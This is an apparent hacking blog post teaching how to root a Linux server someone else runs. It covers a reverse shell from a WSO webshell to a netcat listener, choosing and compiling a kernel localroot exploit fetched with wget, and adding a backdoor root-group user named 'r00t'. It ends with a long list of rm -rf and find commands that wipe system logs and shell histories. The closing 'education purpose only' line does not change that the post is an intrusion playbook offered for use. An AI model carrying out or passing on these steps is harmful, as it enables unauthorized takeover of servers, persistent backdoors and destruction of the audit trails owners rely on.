Bài liên quan
Hello guys, hope you all are doing great! today i will explain how to root a Linux server with a localroot.
What is rooting?
Rooting is the process of exploiting the kernel to gain administrator(root) rights on servers.
Requirements:
  • Basic Unix/Linux Command Knowledge
  • Shell Acess On Targeted Server
  • PHP WebShell With Backconnect Option (Click Here to Download WSO 2.5 webshell)
  • A Localroot Exploit (Click Here to download localroot collection)
  • Netcat (Click Here to download)

  • Lets Get Started.... 


    [#] Backconnecting
    First of all you will need an open port on your router inorder to backconnect. Information on port forwarding can be found HERE
    Open your command prompt/terminal cd to the netcat path and type:
    nc -vlp 1337

    where 1337 is the open port on your router. And it should be saying:
    listening on [any] 1337 ...

    Now go to your webshell and navigate to "BackConnect Option". The backconnect option is located under Network in the provided WSO webshell. 
    Enter your port and click "Connect". 
    Now go back to command prompt if you see something like:
    sh: no job control in this shell

    It means we have sucessfully backconnected to the server. Now lets start rooting the box


    [#] Choosing Localroot Exploit
    We will need a localroot exactly matching the kernel and year its build. The older the kernel the better the chances of finding an exploit and rooting it. To check which version of kernel its using Execute the following:
    uname -rv

    it will give you something like:
    2.6.18-348.12.1.el5PAE #1 SMP Wed Jan 01 06:17:31 EDT 2013 i686 i686 i386 GNU/Linux

    Now choose a localroot matching the kernel and year from the localroot collection which i provided or if you cant find it in the collection just google the kernel version and find an exploit.


    [#] Executing Localroot Exploit
    Upload the localroot via webshell or if you have it uploaded somewhere you can use the following command to download it to the server.
    wget http://www.site.com/localroot.c

    Now If your exploit is with a .c extension you will have to compile it. otherwise just skip to next step. For compiling:
    gcc filename.c -o outputfilename


    If you get permission denied error compile it locally or in other box and upload it to server. 
    Giving full permission to the file:
    chmod 0777 filename

    Finally executing the exploit:
    ./filename

    Now to check if you have got root execute the following:
    whoami

    If its says root it means you have successfully rooted the server.


    [#] Adding New User
    The following command adds a new user on server named "r00t"
    adduser -g 0 r00t -G wheel,sys,bin,daemon,adm,disk -d /r00t -s /bin/sh

    Now give a password for the user r00t type:
    passwd r00t

    Enter a password, confirm it and it should be saying
    passwd: all authentication tokens updated successfully.

    Now you will be able to login via putty or any ssh client.


    [#] Clearing Logs
    Now time for clearing our logs execute the following:
    rm -rf /tmp/logs
    rm -rf $HISTFILE
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_history
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_logout
    rm -rf /usr/local/apache/logs
    rm -rf /usr/local/apache/log
    rm -rf /var/apache/logs
    rm -rf /var/apache/log
    rm -rf /var/run/utmp
    rm -rf /var/logs
    rm -rf /var/log
    rm -rf /var/adm
    rm -rf /etc/wtmp
    rm -rf /etc/utmp
    find / -name *.bash_history -exec rm -rf {} \;
    find / -name *.bash_logout -exec rm -rf {} \;
    find / -name "log*" -exec rm -rf {} \;
    find / -name *.log -exec rm -rf {} \;
    Note:- Rooting a box you dont own is illegal this information is for education purpose only. 
    Stay safe and gud luck!

    Post a Comment

     
    Top

    Nhận xét mới đăng tải!

    Loading…
    X